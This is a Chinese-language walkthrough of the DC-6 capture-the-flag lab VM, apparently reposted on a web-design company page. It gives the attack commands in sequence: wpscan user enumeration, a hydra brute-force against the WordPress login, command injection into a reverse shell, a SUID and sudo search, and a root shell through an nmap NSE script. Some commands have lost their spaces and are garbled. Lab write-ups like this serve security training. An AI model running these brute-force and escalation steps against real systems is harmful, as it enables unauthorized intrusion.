DC-6 靶机全流程攻略
2026/8/21 8:59:44 网站建设 项目流程

DC-6 靶机攻略

扫描靶机

目录爆破

访问网站

http://192.168.200.146/wp-admin/

把hosts文件加入192.168.200.146 wordy,进入网站

进入刚刚目录爆破出的后台页面

http://192.168.200.146/wp-admin/

用wpscan扫用户名

wpscan--urlhttp://wordy--enumerateu

用cewl爬网站生成密码

cewl http://wordy-wpass.txt

爆破,但是没爆破出来

换一个更大的字典,直接跑kali自带的字典

hydra-Lusers.txt-P/usr/share/wordlists/rockyou.txt wordy http-post-form"/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location"-t20-F

这也太久了,全部跑完10天往上了,查资料发现mark的密码是helpdesk01,刚好rockyou字典里有,就当爆破出来了,登录mark的账号

找到可以输入IP的工具,试试能不能命令注入

确实可以注入,反弹shell,由于输入框限制了字数,改发包

Bash不行,换nc,成功

获取伪终端

python-c'import pty;pty.spawn("/bin/bash")'

查看提权点

sudo-lfind/-perm-4000-typef2>/dev/null

查看文件,发现在mark家目录里有一个thingtodo文件,记录了graham的密码

GSo7isUM1D4

登录graham账户

查看提权点,发现graham 可以以 jens 身份无密码执行/home/jens/backups.sh

往脚本加入/bin/bash

以jens身份跑该脚本

sudo-ujens /home/jens/backups.sh

查看提权点,jens可以以root身份无密码执行nmap

nmap 有一个--script参数,可以加载外部的 lua 脚本执行,可以写一个脚本来获取root shell

echo'os.execute("/bin/sh")'>/tmp/root.nsesudonmap--script=/tmp/root.nse

--script参数只认 .nse(Nmap Scripting Engine)后缀的文件

拿到flag


需要专业的网站建设服务?

联系我们获取免费的网站建设咨询和方案报价,让我们帮助您实现业务目标

立即咨询